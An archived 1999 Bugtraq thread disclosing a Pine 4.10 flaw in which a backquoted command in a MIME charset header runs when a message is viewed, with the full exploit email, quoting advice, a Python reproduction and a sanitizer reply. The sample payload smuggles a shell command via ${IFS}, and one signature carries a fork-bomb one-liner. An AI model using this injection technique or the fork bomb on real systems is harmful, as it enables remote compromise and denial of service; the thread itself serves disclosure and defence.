pine4.10-remote.txt

17 Aug 1999, reported by Packet Storm (packetstormsecurity.com)

Remote code execution in Pine 4.10 (and earlier) when a message is viewed: the attacker-controlled charset parameter of a MIME Content-Type header is substituted into a mailcap command that Pine hands to /bin/sh, so backquotes in the parameter turn into a command substitution the shell executes.

Code
Date: Mon, 8 Feb 1999 00:22:17 +0100  
From: Michal Zalewski <[email protected]>  
To: [email protected]  
Subject: remote exploit on pine 4.10 - neverending story?  
  
Affected systems:  
-----------------  
  
Any Un*x system running 'pine' up to version 4.10 (latest).  
  
Compromise:  
-----------  
  
Remote execution of arbitrary code when message is viewed.  
  
Details:  
--------  
  
About five months ago, I reported vulnerability in metamail package used  
with pine. I also noticed that '`' character is incorrectly expanded by  
pine. Problem has been ignored (probably no one understood what I am  
talking about?;-). But no matter. An excerpt from /etc/mailcap:  
  
text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr  
'[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput  
  
Impact:  
-------  
  
And now, ladies and gentlemen - my old bug, reinvented. Usually, above  
mailcap line is expanded to:  
  
[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'  
'[a-z]'`" = iso-8859-1)  
  
Hmm, but take a look at this message:  
  
************************** MIME MESSAGE FOLLOWS **************************  
From: Attacker <[email protected]>  
To: Victim <[email protected]>  
Subject: Happy birthday  
...  
MIME-Version: 1.0  
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"  
  
--8323328-235065145-918425607=:319  
Content-Type: TEXT/PLAIN; charset='US-ASCII'  
  
Make a wish...  
  
--8323328-235065145-918425607=:319  
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"  
Content-Transfer-Encoding: BASE64  
Content-Description: wish  
Content-Disposition: attachment; filename="wish.c"  
  
...it could be your last.  
*************************** MIME MESSAGE ENDS ***************************  
  
The result is:  
  
[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr  
'[A-Z]' '[a-z]'`" = iso-8859-1)  
  
...and arbitrary code ('touch ME', encoded using ${IFS} trick) is  
executed when message is viewed.  
  
Fix:  
----  
  
Well, it's the second time I report problems with ` in headers.  
Maybe pine developers should wait a little longer ;-)  
  
_______________________________________________________________________  
Michal Zalewski [[email protected]] [ENSI / marchew] [dione.ids.pl SYSADM]  
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:  
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]  
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]  
  
-------------------------------------------------------------------------  
  
Date: Mon, 8 Feb 1999 18:13:53 +0100  
From: Thomas Roessler <[email protected]>  
To: [email protected]  
Subject: Re: remote exploit on pine 4.10 - neverending story?  
  
This bug exhibits a general mailcap design problem, actually some  
apparent lack of clarity in RFC 1524: The mailcap format  
specification does not define where quoting takes place. As a  
result, users tend to do quoting manually using constructs like  
"%..." or '%...'. Software tends not to do _any_ quoting of its  
own.  
  
Why this means begging for disaster is obvious: Attackers can  
construct strings with appropriate shell metacharacters to trick  
users into executing arbitrary shell commands - just like Michal  
demonstrated for this special case.  
  
The only proper solution is that users MUST NOT perform any quoting  
on their own in mailcap files, and that software MUST perform proper  
shell quoting when expanding the %{something} strings. "Proper  
shell quoting" means to put the complete string into single quotes  
and to replace any ' inside the string by the sequence of characters  
'\''. (Note that this is already in some Unix programming FAQ.)  
  
"Simply" trying to escape or wipe out shell metacharacters will also  
be a recipe for problems. Think about certain bash versions'  
handling of (as far as I recall) \xff as a word separator.  
  
tlr  
--  
Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/  
2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1  
  
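The expansion Michal traces in the first message and the quoting rule Thomas recommends in the second, worked through as an added Python example (not Pine's code and not from either post). The message is constructed to mirror the one in the first post, MAILCAP_TEST is the test= field of the /etc/mailcap line quoted there, and the MAILCAP_CHARSET environment variable, the helper names and the choice of bash for the optional live run are assumptions of this example. The scanner splits a command into the backquoted bodies sh will run, following the rule that a body ends at the first unescaped backquote; the live run's only side effect is the attacker's `touch ME` in an empty temporary directory.

```python
"""Pine 4.10 mailcap expansion, reproduced offline.

Added example, not Pine's code and not from either post.  ATTACK_MESSAGE is a
constructed copy of the message in the first post; MAILCAP_TEST is the test=
field of the /etc/mailcap line quoted there.  MAILCAP_CHARSET and the helper
names are this example's own assumptions.
"""
import email
import os
import shutil
import subprocess
import tempfile

# Constructed sample, modelled on the message in the post (not captured mail).
ATTACK_MESSAGE = b"""\
From: Attacker <attacker@example.org>
To: Victim <victim@example.org>
Subject: Happy birthday
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=US-ASCII

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
--8323328-235065145-918425607=:319--
"""

# test= field of the mailcap entry quoted in the post.
MAILCAP_TEST = "test \"`echo %{charset} | tr '[A-Z]' '[a-z]'`\" = iso-8859-1"


def charsets(raw):
    """Charset parameter of each text/plain part, as the MUA reads it."""
    msg = email.message_from_bytes(raw)
    return [p.get_param("charset") for p in msg.walk()
            if p.get_content_type() == "text/plain"]


def pine_expand(template, charset):
    """What the execve trace in the post shows Pine 4.10 doing: the raw header
    value goes into the command text, wrapped in single quotes."""
    return template.replace("%{charset}", "'" + charset + "'")


def posix_quote(value):
    """Thomas Roessler's rule: whole value in single quotes, each ' as '\\''."""
    return "'" + value.replace("'", "'\\''") + "'"


def env_expand(template, charset):
    """This example's alternative (not from the posts): the value never enters
    the command text; the MUA exports it and the mailcap line names the variable."""
    return template.replace("%{charset}", '"$MAILCAP_CHARSET"'), {"MAILCAP_CHARSET": charset}


def backquote_bodies(cmd):
    """Bodies of the `...` substitutions sh will run for cmd, in order.

    Outside backquotes the usual states apply (top level, '...', "...").  Once
    a backquote opens, the body runs to the first unescaped backquote: POSIX
    leaves quotes inside a backquoted body undefined, and bash and dash both
    stop at the first backquote there, whatever quotes surround it.
    """
    bodies, body, stack, i = [], [], ["top"], 0
    while i < len(cmd):
        c, state = cmd[i], stack[-1]
        if state == "bq":
            if c == "`":
                bodies.append("".join(body))
                body, _ = [], stack.pop()
            elif c == "\\" and i + 1 < len(cmd) and cmd[i + 1] in "\\`$":
                body.append(cmd[i + 1])      # the only escapes that work in `...`
                i += 1
            else:
                body.append(c)
        elif state == "sq":
            if c == "'":
                stack.pop()
        else:                                # top level or inside "..."
            if c == "\\":
                i += 1                       # escaped character is never special
            elif c == "`":
                stack.append("bq")
            elif c == "'" and state == "top":
                stack.append("sq")           # ' is literal inside "..."
            elif c == '"':
                stack.pop() if state == "dq" else stack.append("dq")
        i += 1
    return bodies


def run_under_bash(cmd, env=None):
    """Run cmd with bash (the /bin/sh of Linux when the post was written) in an
    empty temp dir and report whether `touch ME` left a file.  None if bash is
    unavailable or cannot be spawned."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    with tempfile.TemporaryDirectory() as d:
        try:
            subprocess.run([bash, "-c", cmd], cwd=d, env={**os.environ, **(env or {})},
                           capture_output=True, timeout=10)
        except (OSError, subprocess.SubprocessError):
            return None
        return os.path.exists(os.path.join(d, "ME"))


if __name__ == "__main__":
    evil = charsets(ATTACK_MESSAGE)[1]
    naive = pine_expand(MAILCAP_TEST, evil)
    print("pine-style:", backquote_bodies(naive), run_under_bash(naive))
    safe, env = env_expand(MAILCAP_TEST, evil)
    print("env-style :", backquote_bodies(safe), run_under_bash(safe, env))
    print("quoted, outside backquotes:",
          backquote_bodies("test " + posix_quote(evil) + " = iso-8859-1"))
```

Note what the quoting rule does and does not cover. Wrapping the value in single quotes is exactly what the execve trace in the first post already shows Pine doing, and the code still runs, because the mailcap line puts %{charset} inside a backquoted pipeline, where the first backquote in the value ends that pipeline's body regardless of the surrounding single quotes; the scanner reports `touch${IFS}ME` as a body of its own. Single-quoting is sufficient when the placeholder stands outside any backquotes (`test %{charset} = iso-8859-1` yields no command substitution at all). For a line shaped like the one in /etc/mailcap the value has to reach the shell by a route that is not command text, which is what the environment-variable variant does.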
-------------------------------------------------------------------------  
  
Date: Mon, 8 Feb 1999 09:25:11 -0800  
From: John D. Hardin <[email protected]>  
To: [email protected]  
Subject: Re: remote exploit on pine 4.10 - neverending story?  
  
  
Okay, I have added `` -> " conversion to my procmail MIME sanitizer.  
  
Michal, is that the only way to exploit this? Or should there be ` ->  
' conversion as well?  
  
See http://www.wolfenet.com/~jhardin/procmail-security.html for  
details.  
  
--  
John Hardin KA7OHZ [email protected]  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
Your mouse has moved. Windows NT must be restarted for the change  
to take effect. Reboot now? [ OK ]  
-----------------------------------------------------------------------  
101 days until Star Wars episode I  
  
